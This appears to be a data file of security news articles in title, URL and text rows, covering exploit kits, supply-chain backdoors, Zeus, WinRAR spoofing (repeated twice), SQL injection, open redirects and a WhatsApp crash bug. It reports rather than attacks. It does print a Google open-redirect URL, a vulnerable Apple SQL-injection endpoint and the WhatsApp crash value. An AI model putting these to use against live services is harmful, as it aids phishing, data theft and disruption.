The attack used the BlackHole exploit kit, which redirected the website's visitors to an external malware-hosting site. Researchers detected an additional 3,500 unique infected WordPress sites, which redirected visitors to malicious sites between Aug. 28 to 31. During September , the company blocked redirects from 2,515 WordPress sites, Sirmer said.
In bottom part of code, there is a request to where only one line of code is stored: assa ='Domain with Black Hole exploit kit'. A fix is available for the TimThumb tool.
Passwordstate Password Manager Update Hijacked to Install Backdoor on Thousands of PCs,https://thehackernews.com/2021/04/passwordstate-password-manager-update.html,"Click Studios, the Australian software company behind the Passwordstate password management application, has notified customers to reset their passwords following a supply chain attack.
The Adelaide-based firm said a bad actor used sophisticated techniques to compromise the software's update mechanism and used it to drop malware on user computers.
The breach is said to have occurred between April 20, 8:33 PM UTC, and April 22, 0:30 AM UTC, for a total period of about 28 hours.
""Only customers that performed In-Place Upgrades between the times stated above are believed to be affected,"" the company said in an advisory. ""Manual Upgrades of Passwordstate are not compromised. Affected customers password records may have been harvested.""
The development was first reported by the Polish tech news site Niebezpiecznik. It's not immediately clear who the attackers are or how they compromised the password manager's update feature. Click Studios said an investigation into the incident is ongoing but noted ""the number of affected customers appears to be very low.""
Passwordstate is an on-premise web-based solution used for enterprise password management, enabling businesses to securely store passwords, integrate the solution into their applications, and reset passwords across a range of systems, among others. The software is used by 29,000 customers and 370,000 security and IT professionals globally, counting several Fortune 500 companies spanning verticals such as banking, insurance, defense, government, education, and manufacturing.
According to an initial analysis shared by Denmark-based security firm CSIS Group, the malware-laced update came in the form of a ZIP archive file, ""Passwordstate_upgrade.zip,"" which contained a modified version of a library called ""moserware.secretsplitter.dll"" (VirusTotal submissions here and here).
This file, in turn, established contact with a remote server to fetch a second-stage payload (""upgrade_service_upgrade.zip"") that extracted Passwordstate data and exported the information back to the adversary's CDN network. Click Studios said the server was taken down as of April 22 at 7:00 AM UTC.
The full list of compromised information includes computer name, user name, domain name, current process name, current process id, names and IDs of all running processes, names of all running services, display name and status, Passwordstate instance's Proxy Server Address, usernames and passwords..
Click Studios has released a hotfix package to help customers remove the attacker's tampered DLL and overwrite it with a legitimate variant. The company is also recommending that businesses reset all credentials associated with external facing systems (firewalls, VPN) as well as internal infrastructure (storage systems, local systems) and any other passwords stored in Passwordstate.
Passwordstate's breach comes as supply chain attacks are fast emerging a new threat to companies that depend on third-party software vendors for their day-to-day operations. In December 2020, a rogue update to the SolarWinds Orion network management software installed a backdoor on the networks of up to 18,000 customers.
Last week, software auditing startup Codecov alerted customers that it discovered its software had been infected with a backdoor as early as January 31 to gain access to authentication tokens for various internal software accounts used by developers. The incident didn't come to light until April 1.
Hacking Team and Boeing Built Cyber Weaponized Drones to Spy on Targets,https://thehackernews.com/2015/07/boeing-drone-hacking.html,"The leaked internal emails from the Italian surveillance software company Hacking Team have revealed that the spyware company developed a robotic aircraft designed to attack computers and smartphone devices through Wi-Fi networks.
Over a year ago, some security researchers developed a drone called 'Snoopy' that was capable to intercept data from users' Smartphones through spoofed wireless networks.
Now, the email conversations posted on WikiLeaks website reveal that both Boeing and Hacking Team want unmanned aerial vehicles (UAVS) called Drones to carry out attacks that inject spyware into target computers or mobile phones via WiFi.
After attending the International Defense Exposition and Conference (IDEX) in Abu Dhabi in February 2015, the U.S. drone company Boeing subsidiary Insitu become interested in using surveillance drones to deliver Hacking Team's Remote Control System Galileo for even more surveillance.
Among the emails, co-founder Marco Valleri gave a roadmap of projects that Hacking Team have underway, including ""Tactical Network Injector"" (TNI) — a piece of hardware designed to inject malicious code into Wi-Fi networks, making it act as a malicious access point to launch man-in-the-middle (MITM) attacks or exploits.
To develop a way to infect computers via drone, Hacking Team employee Andrea Di Pasquale was given a task of developing a ""mini-TNI"":
Transportable by a drone (!)
Drones used to Spy on Targets
In case, if a target makes use of a public Wifi network in a hotel or a coffee shop to connect his/her device to the Internet, the drone could intercept the traffic and inject the malicious code that secretly installs Hacking Team spyware.
The mini-TNI request was originated from the US-based Insitu, a subsidiary of Boeing that makes a range of unmanned aircraft systems, including the small ScanEagle surveillance drone and RQ-21A ""Blackjack"".
Giuseppe Venneri, an Insitu intern, wrote to Hacking Team's key account manager Emad Shehata this April:
""We see potential in integrating your Wi-Fi hacking capability into an airborne system [drone] and would be interested in starting a conversation with one of your engineers [Hacking Team staff] to go over, in more depth, the payload capabilities including the detailed size, weight, and power specs of your Galileo System.""
The email conversation was still in the early stages as of the Hacking Team's leak, so you do not have to worry about drones. Also, it is not clear as to who the customers for the Hacking team's spying drones would be.
Though the NSA is very much fond of spyware and surveillance software, there're chances that NSA or other United States agencies would line up as customers of the Hacking Team's Spying drones. Now, you don't have to be surprised if drones are eventually doing a lot more than just snapping pictures.
WinRAR File Extension Spoofing vulnerability allows Hackers to Hide Malware,https://thehackernews.com/2014/04/winrar-file-extension-spoofing.html,"Imagine, You Open a Winrar archive of MP3 files, but what if it will install a malware into your system when you play anyone of them.
WinRAR, a widely used file archiver and data compression utility helps hackers to distribute malicious code. Israeli security researcher Danor Cohen (An7i) discovered the WinRAR file extension spoofing vulnerability.
WinRAR file extension spoofing vulnerability allows hackers to modify the filename and extension inside the traditional file archive, that helps them to hide binary malicious code inside an archive, pretending itself as '.jpg' , '.txt' or any other format.
Using a Hex editor tool, he analysed a ZIP file and noticed that winrar tool also adds some custom properties to an archive, including two names - First name is the original filename (FAX.png) and second name is the filename (FAX.png) that will appear at the WINRAR GUI window.
Danor manipulated the second filename and extension to prepare a special ZIP archive, that actually include a malware file ""FAX.exe"", but displaying itself as ""FAX.png"" to the user.
Cyber intelligence company, IntelCrawler also published a report, which revealed that cybercriminals specialized in cyber espionage attacks are using this zero-day vulnerability in the wild to target several aerospace corporations, military subcontractors, embassies, as well as Fortune Global 500 companies.
Using this technique, an attacker can drop any malware in very convincing manner to the victim's system. ""Using this method the bad actors bypass some specific security measures including e-mail server's antivirus systems"" IntelCrawler said.
Danor successfully exploited winrar version 4.20, and IntelCrawler confirmed that the vulnerability also works on all WinRar versions including v.5.1.
A video demonstration has been prepared by Indian Security Researcher Ajin Abraham, shown below:
""One of the chosen tactics includes malicious fake CV distribution and FOUO (For Official Use Only)-like documents, including fax scanned messages""
Using social engineering techniques, attacker are targeting high profile victims with spear phishing mails, ""Most of sent malicious attachments are hidden as graphical files, but password protected in order to avoid antivirus or IDS/IPS detection."" IntelCrawler reported.
In above example, the Malware archive file was password protected to avoid antivirus detection, used in an ongoing targeted cyber espionage campaign.
Researchers found Zeus-like Trojan as an attachment, which has ability to establish remote administration channel with the infected victim, gather passwords and system information, then send the collected and stolen data to the Command & Control server hosted in Turkey (IP, Salay Telekomünikasyon).
Users are advised to use an alternative archiving software and avoid opening archives with passwords even if it has legitimate files.
Update: Baidu Antivirus is now able to detect (identified as Exploit.WinRar.spoof.gen) hidden files generated with WinRAR File Extension Spoofing vulnerability.
In a recent updated, Baidu Antivirus added Winrar related threat to their malware signature database. Security experts suggest users to immediately upgrade to WinRAR version 5.0 or higher to avoid this vulnerability.
WinRAR File Extension Spoofing vulnerability allows Hackers to Hide Malware,https://thehackernews.com/2014/04/winrar-file-extension-spoofing.html,"Imagine, You Open a Winrar archive of MP3 files, but what if it will install a malware into your system when you play anyone of them.
WinRAR, a widely used file archiver and data compression utility helps hackers to distribute malicious code. Israeli security researcher Danor Cohen (An7i) discovered the WinRAR file extension spoofing vulnerability.
WinRAR file extension spoofing vulnerability allows hackers to modify the filename and extension inside the traditional file archive, that helps them to hide binary malicious code inside an archive, pretending itself as '.jpg' , '.txt' or any other format.
Using a Hex editor tool, he analysed a ZIP file and noticed that winrar tool also adds some custom properties to an archive, including two names - First name is the original filename (FAX.png) and second name is the filename (FAX.png) that will appear at the WINRAR GUI window.
Danor manipulated the second filename and extension to prepare a special ZIP archive, that actually include a malware file ""FAX.exe"", but displaying itself as ""FAX.png"" to the user.
Cyber intelligence company, IntelCrawler also published a report, which revealed that cybercriminals specialized in cyber espionage attacks are using this zero-day vulnerability in the wild to target several aerospace corporations, military subcontractors, embassies, as well as Fortune Global 500 companies.
Using this technique, an attacker can drop any malware in very convincing manner to the victim's system. ""Using this method the bad actors bypass some specific security measures including e-mail server's antivirus systems"" IntelCrawler said.
Danor successfully exploited winrar version 4.20, and IntelCrawler confirmed that the vulnerability also works on all WinRar versions including v.5.1.
A video demonstration has been prepared by Indian Security Researcher Ajin Abraham, shown below:
""One of the chosen tactics includes malicious fake CV distribution and FOUO (For Official Use Only)-like documents, including fax scanned messages""
Using social engineering techniques, attacker are targeting high profile victims with spear phishing mails, ""Most of sent malicious attachments are hidden as graphical files, but password protected in order to avoid antivirus or IDS/IPS detection."" IntelCrawler reported.
In above example, the Malware archive file was password protected to avoid antivirus detection, used in an ongoing targeted cyber espionage campaign.
Researchers found Zeus-like Trojan as an attachment, which has ability to establish remote administration channel with the infected victim, gather passwords and system information, then send the collected and stolen data to the Command & Control server hosted in Turkey (IP, Salay Telekomünikasyon).
Users are advised to use an alternative archiving software and avoid opening archives with passwords even if it has legitimate files.
Update: Baidu Antivirus is now able to detect (identified as Exploit.WinRar.spoof.gen) hidden files generated with WinRAR File Extension Spoofing vulnerability.
In a recent updated, Baidu Antivirus added Winrar related threat to their malware signature database. Security experts suggest users to immediately upgrade to WinRAR version 5.0 or higher to avoid this vulnerability.
Fraud-as-a-Service of Zeus Malware advertised on social network,https://thehackernews.com/2013/04/zeus-malware-fraud-as-service.html,"Cyber crime enterprise is showing a growing interest in monetization of botnets, the most targeted sector in recent months is banking. One of most active malware that still menaces Banking sector is the popular Zeus. Zeus is one of the oldest, it is active since 2007, and most prolific malware that changed over time according numerous demands of the black-market.
Recently, Underground forums are exploded the offer of malicious codes, hacking services and bullet proof hosting to organize a large scale fraud. Cyber criminals are selling kits at reasonable prices or entire botnets for renting, sometimes completing the offer with information to use during the attacks.
The model described, known also as a Fraud-as-a-Service, is winning, malicious code such as Zeus, SpyEye, Ice IX, or even Citadel have benefited of the same sales model, cyber criminals with few hundred dollars are able to design their criminal operation.
Since now the sales model and the actor involved remained confined to the underground, usually the access to the offer of cyber crime was possible through selected channels, such black market forums, Deep Web sites or IRC communities.
The cyber crime is becoming fearless world. RSA security experts published an interesting article to describer a concerning phenomena, the criminal offer has exploited the popularity and wide audience of Social Network proposing a customized botnet panel for Zeus Trojan.
The malicious application appears to be developed by Indonesian-speaking developers that improved previous version of the popular Zeus Trojan kit.
The team adopted a winning commercial approach designing a demo website for would-be buyers public visible and publishing a dedicated Facebook page.
The cyber criminals used the social network page to update their customers providing information about botnets, exploits, cyber crime, and of course about their own products (Zeus v
The different cyber laws in force in different countries and their light application in many states has sustained the growth of cyber crime worldwide, criminals are now starting to publicly offer/ acquire malicious codes and hacking services for malicious campaign.
IT community need a globally recognized law framework to address cyber criminal organizations, law enforcement urge the establishment of severe penalties and shared effort to fight a battle against an invisible enemy that hasn't a specific geographical connotation.
Until cyber criminals will have the opportunity to hide themselves in a country whose government will not properly persecute them it's impossible to stop cyber criminal wave.
Cyber crime contrast is a global emergency.
URL redirection Vulnerability in Google & Facebook,https://thehackernews.com/2012/01/url-redirection-vulnerability-in-google.html,"URL redirection Vulnerability in Google
An open redirect is a vulnerability that exists when a script allows redirectionto an external site by directly calling a specific URL in an unfiltered,unmanaged fashion, which could be used to redirect victims to unintended,malicious web sites. A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect.
A similar vulnerability is reported in Google by ""Ucha Gobejishvili ( longrifle0x )"". This problem may assist an attacker to conduct phishing attacks, trojan distribution, spammers.
Url: https://accounts.google.com/o/oauth2/auth?redirect_uri=https://www.something.com
Same vulnerability in Facebook, Discovered by ZeRtOx from Devitel group:
Impact of Vulnerability :
The user may be redirected to an untrusted page that contains malware which may then compromise the user's machine. This will expose the user to extensive risk and the user's interaction with the web server may also be compromised if the malware conducts keylogging or other attacks that steal credentials, personally identifiable information (PII), or other important data.
The user may be subjected to phishing attacks by being redirected to an untrusted page. The phishing attack may point to an attacker controlled web page that appears to be a trusted web site. The phishers may then steal the user's credentials and then use these credentials to access the legitimate web site.
This Bug Could Have Let Anyone Crash WhatsApp Of All Group Members,https://thehackernews.com/2019/12/whatsapp-group-crash.html,"WhatsApp, the world's most popular end-to-end encrypted messaging application, patched an incredibly frustrating software bug that could have allowed a malicious group member to crash the messaging app for all members of the same group, The Hacker News learned.
Just by sending a maliciously crafted message to a targeted group, an attacker can trigger a fully-destructive WhatsApp crash-loop, forcing all group members to completely uninstall the app, reinstall it, and remove the group to regain normal function.
Since the group members can't selectively delete the malicious message without opening the group window and re-triggering the crash-loop, they have to lose the entire group chat history, indefinitely, to get rid of it.
Discovered by researchers at Israeli cybersecurity firm Check Point, the latest bug resided in the WhatsApp's implementation of XMPP communication protocol that crashes the app when a member with invalid phone number drops a message in the group.
""When we attempt to send a message where the parameter 'participant' receives a value of 'null,' a 'Null Pointer Exception' is thrown,"" the researchers explain in a report shared with The Hacker News prior to its release.
""The parser for the participant's phone number mishandles the input when an illegal phone number is received. When it receives a phone number with a length, not in the ranger 5-20 or a non-digit character, it would read it as a 'null' string.""
To be noted, the issue resided in both, WhatsApp for Android and iOS, but in an interview with The Hacker News, Check Point researcher Roman Zaikin confirmed that the exploit works smoothly against all vulnerable Android users, but sometimes doesn't reproduce on iOS.
The attack requires a malicious group member to manipulate other parameters associated with messages in a conversation that is otherwise protected using end-to-end encryption.
In order to carry out this attack, an attacker can leverage WhatsApp Web and a web browser debugging tool in combination with an open source WhatsApp manipulation tool that Check Point released last year.
The WhatsApp manipulation tool is an extension for Burp Suite penetration testing software that allows users to intercept, decrypt, and re-encrypt their WhatsApp communication using their own encryption keys.
As shown in the video demonstration, the researchers used this setup to trigger the crash bug against all members of a group by simply replacing the participant's parameter from the sender's phone number to 'a@s.whatsapp.net,' an invalid non-digit phone number.
""The bug will crash the app, and it will continue to crash even after we reopen WhatsApp, resulting in a crash loop,"" the researchers say.
""Moreover, the user will not be able to return to the group and all the data that was written and shared in the group is now gone for good. The group cannot be restored after the crash has happened and will have to be deleted in order to stop the crash.""
It should be noted that the attack would not affect the sender since the malicious message was injected in transit after it left the sender's device.
Check Point responsibly reported this crash bug to the WhatsApp security team back in late August this year, and the company patched the issue with the release of WhatsApp version 2.19.58 in mid-September.
The WhatsApp developers also ""added new controls to prevent people from being added to unwanted groups to avoid communication with untrusted parties altogether.""
""Because WhatsApp is one of the world's leading communication channels for consumers, businesses and government agencies, the ability to stop people using WhatsApp and delete valuable information from group chats is a powerful weapon for bad actors,"" Oded Vanunu, Check Point's Head of Product Vulnerability Research said.
""WhatsApp greatly values the work of the technology community to help us maintain strong security for our users globally. Thanks to the responsible submission from Check Point to our bug bounty program, we quickly resolved this issue for all WhatsApp apps in mid September,"" WhatsApp Software Engineer Ehren Kret told The Hacker News.
WhatsApp users are highly recommended to always keep their apps up-to-date in order to protect themselves against known attacks.
Specialized Trojan can stealing credit card details from hotel,https://thehackernews.com/2012/04/specialized-trojan-can-stealing-credit.html,"Specialized Trojan can stealing credit card details from hotel
The next time you check in to a hotel, a cybercriminal could be checking you out. A remote access computer Trojan (RAT) designed to steal credit card details from hotel point-of-sale (PoS) applications is being sold on the underground forums, according to researchers from security firm Trusteer.
Trusteer, the world's leading provider of secure web access services, detected these schemes and says hotel poaching is a virile trade in underground and tech forums. Attack codes can be purchased in Visa underground forums for $280 and the spyware cannot be detected by anti-virus software. The package even includes a manual loaded with tips on how the poacher can trick the desk clerk into loading the spyware for them.
Malware writers often repackage their malicious installers with new algorithms in order to evade signature-based antivirus detection, said Bogdan Botezatu, a senior e-threat analyst at antivirus vendor BitDefender.
""The fact that the RAT's creator decided to target the hospitality industry is consistent with a recently observed change in the focus of cybercriminals - an expansion from online banking attacks to attacks against PoS systems, Criminals are increasingly expanding the focus of their attacks from online banking targets to enterprises,"" said Trusteer's CTO Amit Klein.
While this credit card scam seems nearly impossible to detect and prevent, you can keep your finances, and identity, in check by routinely monitoring your bank balances, and reporting any suspicious or unauthorized transactions to your bank immediately.
Apple database hacked with SQL injection by Anonymous,https://thehackernews.com/2011/07/apple-database-hacked-with-sql.html,"Apple database hacked with SQL injection by Anonymous
Anonymous hackers announce on twitter that Apple can be there next target. They expose one SQL vulnerability on Apple domain with One table ""Users"" data.
Vulnerable Link : https://abs.apple.com:8080/ssurvey/survey?id=
Exposure Link : https://pastebin.com/tkmZDG9m
These all hacks now consider under Operation Antisec by Anonymous and Lulzsec Members.
Breach Database Site 'LeakedSource' Goes Offline After Alleged Police Raid,https://thehackernews.com/2017/01/leakedsource-police-raid.html,"The biggest mistake companies make with data security is leaving all their secrets unprotected at one place, which if attacked, they are all gone in one shot.
An unnamed law enforcement agency has reportedly accessed billions of compromised usernames, email IDs, and their passwords, collected by LeakedSource, a popular breach notification service.
LeakedSource, launched in late 2015, that exposed some of the largest data breaches in 2016, including LinkedIn, DailyMotion, Rambler.ru, Last.fm, VK.com, Weebly, and Foursquare, might be facing a permanent shut down after law enforcement officers allegedly raided its operator.
The LeakedSource website that allowed visitors to look up for their account details that had been collected from multiple data breaches has suddenly disappeared, and its associated social media accounts have been suspended.
The data breach aggregation service had always been criticized for its unethical policy of allowing anyone to look up hacked account details, rather than discreetly notifying compromised account owners.
The service, which indexed more than 3.1 billion compromised accounts records last year, also sells access to the full archive for which it charges a membership fee.
Although there is no official announcement from the company or any law enforcement agency, an online OGFlip forum post made shortly after the site's takedown claims LeakedSource has been raided and the police have seized all the data hosted on it.
Here's the message from a person using the handle LTD wrote on OGF forum:
""Leakedsource is down forever and will not be coming back. Owner raided early this morning. Was not arrested, but all [solid state drives (SSD)] got taken, and LeakedSource servers got subpoenaed and placed under federal investigation. If somehow he recovers from this and launches LS again, then I'll be wrong. But I am not wrong.""
LeakedSource made headlines last year for indexing the leaked data compromised during the high-profile data breach in LinkedIn, MySpace, Twitter, and Weebly.
While it is not clear whether LeakedSource hard drives and servers were located, or was actually raided, and if true, which law enforcement agency conducted the raid, the website is still unavailable.
"Oracle releases 169 Updates, Including 19 Patches for JAVA Vulnerabilities",https://thehackernews.com/2015/01/java-update-patch-vulnerability.html,"Get Ready to update your Java program as Oracle has released its massive patch package for multiple security vulnerabilities in its software.
The United States software maker Oracle releases its security updates every three months on Tuesday, which it referred to as ""Critical Patch Updates"" (CPU). Yesterday, Oracle released its first quarterly CPU-date of this year, issuing a total of 169 security fixes for hundreds of its products including Java, Fusion Middleware, Enterprise Manager and MySQL.
The security update for Oracle's popular browser plug-in Java addresses vulnerabilities in the software, 14 of which could be remotely exploitable without authentication, that means an attacker wouldn't need a username and password to exploit them over a network.
Four Java flaws were marked most severe and received a score of 10.0 on the Common Vulnerability Scoring System (CVSS), the most critical ranking. Nine other Java flaws given a CVSS Base Score of 6.0 or higher.
""Oracle has received specific reports of malicious exploitation of vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that malicious attackers have been successful because customers had failed to apply these Oracle patches,"" Oracle said in a pre-release announcement. ""Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes without delay.""
The other most severe ratings of CVSS base score 10.0 belong to Fujitsu M10-1 of Oracle Sun Systems Products Suite, M10-4 of Oracle Sun Systems Products Suite, and M10-4S Servers of Oracle Sun Systems Products Suite.
Eight vulnerabilities in Oracle database were also addressed in the recent release, including CVE-2014-6567, which received a CVSS Base Score of 9.0, as it allows a full compromise of the targeted server on the Windows platform with authentication. None of the database vulnerabilities could be remotely exploitable without authentication.
A total of 10 security updates have been included for Oracle E-Business Suite, including one assigned CVE-2015-0393 discovered and reported to Oracle this past year by Australian researcher David Litchfield, which could have granted administrator privileges to lower-level users.
Six security fixes have been included for Oracle Supply Chain Suite, 7 for Oracle PeopleSoft Enterprise, 1 for Oracle JDEdwards EnterpriseOne, 17 for Oracle Siebel CRM, and 2 for Oracle iLearning. Oracle's MySQL received 9 security fixes, 3 of which could be remotely exploitable without authentication, and the most critical bug, CVE-2015-0411, had a base score of 7.5.
In total, 36 new fixes have been issued for Oracle Fusion Middleware products, and the most severe bug, CVE-2011-1944, received a rating of 9.3 that affects Oracle HTTP Server. Two of the Oracle Fusion Middleware vulnerabilities fixed in this CPU can result in a server takeover.
The company also provided 29 fixes for the Oracle Sun Systems Products Suite, 10 of which could be remotely exploitable without authentication. One bug, CVE-2013-4784, received the highest CVSS base score of 10.0. This particularly nasty flaw affects XCP Firmware versions prior to XCP 2232. Another bug, CVE-2014-4259, received a rating of 9.0.
You can see the full list of affected software from here. The next CPU date is 14 April 2015. Stay Safe! Stay Tuned!
SQL Injection Vulnerability in 'Yahoo! Contributors Network',https://thehackernews.com/2014/10/sql-injection-vulnerability-in-yahoo.html,"Yahoo! Contributors Network (contributor.yahoo.com), the network of authors that generated the contents such as photographs, videos, articles and their knowledge to more than 600 million monthly visitors, was vulnerable to a Time based Blind SQL Injection vulnerability.
Behrouz Sadeghipour, a security researcher reported the Blind SQLi vulnerability in Yahoo!'s website that could be exploited by hackers to steal users' and authors' database, containing their personal information.
Behrouz reported this flaw to Yahoo! Security team few months back. The team responded positively and within a month they patched the vulnerability successfully. Unfortunately after that Yahoo! announced to shut down 'Yahoo Contributors Network' due to its decreasing popularity and removed all the contents from the web, except some of the ""work for hire"" content may remain on the web.
The critical vulnerability was able to expose the database which carried sensitive and personal information of those authors who was participating and getting paid from their work. While looking around the website, the researcher came across two vulnerabilities in the following URL/files:
The vulnerability allows remote attackers to inject own SQL commands to breach the database of the above vulnerable URLs and get access to the users' personal data.
In 2012, Yahoo! Contributors Network was hacked by a group of hackers called ""D33DS Company"" and ""Owned and Exposed"" data breach exposed stolen 453,491 email addresses and passwords online. Reportedly, at that time hackers used the same technique i.e. SQL Injection attack to carry out the data breach.
SQL Injection (SQLi) attacks have been around for over a decade. It involves inserting a malformed SQL query into an application via client-side input. SQLi vulnerabilities are ranked as Critical one because if it is used by Hackers, it will cause a database breach which will lead to confidential information leakage.
In fact, according to Veracode's 2014 State of Security Software Report , SQL injection vulnerabilities still plague 32% of all web applications.
""We are currently seeing more than 50,000 attacks per day that fall into our SQL Injection categorization. Most of them are automated and try to compromise well known vulnerabilities in common CMS's and web projects (Joomla, WordPress, vBulletin, etc),"" the security researcher, David Dede, of the security firm Sucuri wrote in a blog post.
The analysis carried out by the security firms shows that the number of SQL injection attempts continue to grow as the time passes on.
""If we drill down into our data and hook it up to a geo locator we can also see that the attacks come from everywhere. Most people tend to think that Russia, Brazil, Romania and a few other countries are the ""bad"" sources, but for SQL injection, the top attackers come from the USA, India, Indonesia and China,"" the researcher added.
SQL Injections are a real threat and are being actively attacked and exploited by hackers every day. ""If you are a developer you should be leveraging the OWASP SQL Injection Prevention Cheat Sheet at a minimum.""
Hackers Leak Personal Data from Hundreds of German Politicians On Twitter,https://thehackernews.com/2019/01/germany-politicians-hacked.html,"Germany has been hit with the biggest hack in its history.
A group of unknown hackers has leaked highly-sensitive personal data from more than 100 German politicians, including German Chancellor Angela Merkel, Brandenburg's prime minister Dietmar Woidke, along with some German artists, journalists, and YouTube celebrities.
The leaked data that was published on a Twitter account (@_0rbit) and dated back to before October 2018 includes phone numbers, email addresses, private chats, bills, credit card information and photos of victims' IDs.
Although it is yet unclear who perpetrated this mass hack and how they managed to perform it, the leaked data appears to be collected unauthorizedly by hacking into their smartphones.
The hack targeted all of Germany's political parties currently represented in the federal parliament, including the CDU, CSU, SPD, FDP, Left party (Die Linke) and Greens, except for the far-right Alternative for Germany (AfD).
While Justice Minister Katarina Barley called this mass hacking as a ""serious attack,"" local media reports that none of the leaked data could be considered politically explosive.
Germany's federal office for information security (BSI), who is investigating the attack, said that government networks were not affected by the incident and that the identity of the hackers and their motive were not yet known.
""The BSI is currently intensively examining the case in close cooperation with other federal authorities. The National Cyber Defense Center has taken over the central coordination,"" a BSI spokesperson said on Twitter.
""According to the current state of knowledge there is no concern of the governmental networks. However, we will continue to investigate.""
Among the victims include Chancellor Angela Merkel, President Frank-Walter Steinmeier, Foreign Minister Heiko Maas, as well as Robert Habeck, leader of the Green party, who was particularly badly affected by the attack with hackers leaking his digital communications with his family.
Besides German politicians, the intrusive hack attacks also affected well-known actor Til Schweiger, two renowned German comedians, Jan Boehmermann and Christian Ehring, as well as dozens of journalists from ZDF and ARD–public-funded German media outlets.
Hacking Facebook Account with 'Reconnect' Tool,https://thehackernews.com/2015/03/facebook-hacking-tool.html,"""Signup or Login with Facebook"" ?? You might think twice before doing that next time. A security researcher has discovered a critical flaw that allows hackers take over Facebook accounts on websites that leverage 'Login with Facebook' feature.
The vulnerability doesn't grant hackers access to your actual Facebook password, but it does allow them to access your accounts using Facebook application developed by third-party websites such as Bit.ly, Mashable, Vimeo, About.me, Stumbleupon, Angel.co and possibly many more.
Egor Homakov, a researcher with pentesting company Sakurity, made the social network giant aware of the bug a year ago, but the company refused to fix the vulnerability because doing so would have ruined compatibility of Facebook with a vast number of websites over the Internet.
The critical flaw abuses the lack of CSRF (Cross-Site Request Forgery) protection for three different processes —
Facebook log in
Facebook log out
Third-party account connection
The first two issues ""can be fixed by Facebook,"" Homakov said, but have not done yet. However, the third one needs to be fixed by the website owners those who have integrate ""Login with Facebook"" feature into their websites.
Therefore, blaming Facebook for dismal security in 'Login with Facebook' feature, the researcher publicly released a tool, dubbed RECONNECT, that exploits the bug and lets hackers to generate URLs that can be used to hijack accounts on third-party websites that use 'Login with Facebook' button.
""Go blackhats, don't be shy!"" Homakov wrote on his Twitter, allegedly encouraging hackers and cyber criminals to take benefit from his ready to use tool.
Homakov also published a blog post which gives hackers a step-by-step process for setting up rogue Facebook accounts that victims are redirected to when they tricked into clicking on malicious URLs provided by the attackers.
""Now our Facebook account is connected to the victim account on that website and we can log in that account directly to change email/password, cancel bookings, read private messages and so on,"" Homakov wrote in a blog post.
RECONNECT Facebook hacking tool can generate malicious URLs to hijack Facebook accounts on third-party website including Booking.com, Bit.ly, About.me, Stumbleupon, Angel.co, Mashable and Vimeo.
However, any website that supports 'Login with Facebook' can be hacked by manually inserting its link into the tool that generates Facebook login requests on behalf of its users.
One could realize the dangerous consequences of RECONNECT Facebook hacking tool by calculating how many number of websites over Internet use that blue color ' f ' button of Facebook login. And once a hacker makes a way to get into you account, they could access your private information and use them to hack into your other online accounts.
So, in order to prevent your accounts from malicious hackers, Do Not click on any suspicious URLs provided to you via online messages, emails or social media accounts. And always be careful while surfing over the Internet.
Facebook says it has been aware of the issue for some time now and that third-party sites can protect their users by utilizing Facebook's best practices when using the Facebook sign-in feature.
A Facebook spokesperson released a statement saying, ""This is a well-understood behaviour. Site developers using Login can prevent this issue by following our best practices and using the 'state' parameter we provide for OAuth Login.""
The company also added that they have also made various changes in order to help prevent login CSRF and are evaluating others while ""aiming to preserve necessary functionality for a large number of sites that rely upon Facebook Login.""
'Zip Slip' Vulnerability Affects Thousands of Projects Across Many Ecosystems,https://thehackernews.com/2018/06/zipslip-vulnerability.html,"Security researchers at British software firm Snyk have revealed details of a critical vulnerability that affects thousands of projects across many ecosystems and can be exploited by attackers to achieve code execution on the target systems.
Dubbed ""Zip Slip,"" the issue is an arbitrary file overwrite vulnerability that triggers from a directory traversal attack while extracting files from an archive and affects numerous archive formats, including tar, jar, war, cpio, apk, rar, and 7z.
Thousands of projects written in various programming languages including JavaScript, Ruby, Java, .NET and Go—from Google, Oracle, IBM, Apache, Amazon, Spring/Pivotal, Linkedin, Twitter, Alibaba, Eclipse, OWASP, ElasticSearch, JetBrains and more—contained vulnerable codes and libraries.
Went undetected for years, the vulnerability can be exploited using a specially crafted archive file that holds directory traversal filenames, which if extracted by any vulnerable code or a library, would allow attackers to unarchive malicious files outside of the folder where it should reside.
Using this Zip Slip attack an attacker can even overwrite legitimate executable files or configuration files for an application to trick the targeted system or the user into running it, ""thus achieving remote command execution on the victim's machine,"" the company explains.
""The vulnerability can also cause damage by overwriting configuration files or other sensitive resources, and can be exploited on both client (user) machines and servers.""
""The contents of this zip file have to be handcrafted. Archive creation tools don't typically allow users to add files with these paths, despite the zip specification allowing it. However, with the right tools, it's easy to create files with these paths.""
The company has also published proof-of-concept Zip Slip archives and released a video demonstration, showing how attackers can exploit the Zip Slip vulnerability.
Since April, the company started privately disclosing the Zip Slip vulnerability to all vulnerable libraries and projects maintainers.
A list of all affected libraries and projects has also been posted on Snyk's GitHub repository, some of which have already fixed the issue with the release of updated versions.
Moreover, you can also read Snyk's blog post to learn more about vulnerable codes in different ecosystems through example snippets.
Zeus banking Trojan targeting five major banks in Japan,https://thehackernews.com/2013/02/zeus-banking-trojan-targeting-five.html,"Zeus continues to strike online bank accounts and users, and technology designed to thwart these Trojan attacks continually fails to keep up. Symantec recently came across a new Zeus file targeting five major banks in Japan.
The malware, which has caused serious problems to banking customers in Europe and the U.S, now having maximum concentration on Japanese banks. Target information was reveled by Symantec after decryption of configuration file from new sample. The attacker uses Blackhole exploit kit in order to install Zeus.
Zeus, a financially aimed malware, comes in many different forms and flavors. It can be tweaked to hijack personal PCs, or come in the form of a keylogger that tracks keystrokes as users enter them.
But once installation over, Zeus malware aims to steal online-banking credentials, and phishing schemes and drive-by downloads are most often the avenues hackers use to spread this increasingly sophisticated and evolving Trojan.
In this case, the functionality is the same as that of other Zeus variants. Once infected, Zeus monitors the Web browser visiting the targeted banks and injects HTML code that displays a message in Japanese that states in English: ""In order to provide a better service to our customers, we are updating our personal internet banking system. Please re-enter the information that you provided when you first registered."".
Zeus gained notoriety in 2006 as being the tool of choice for criminals stealing online banking credentials. If your are one of the victim of Zeus, we recommend that you change your passwords for your online accounts and if you have used your credit card while Zeus Trojan was on your computer, contact the bank and let them know that you might be be victim of a phishing attack.
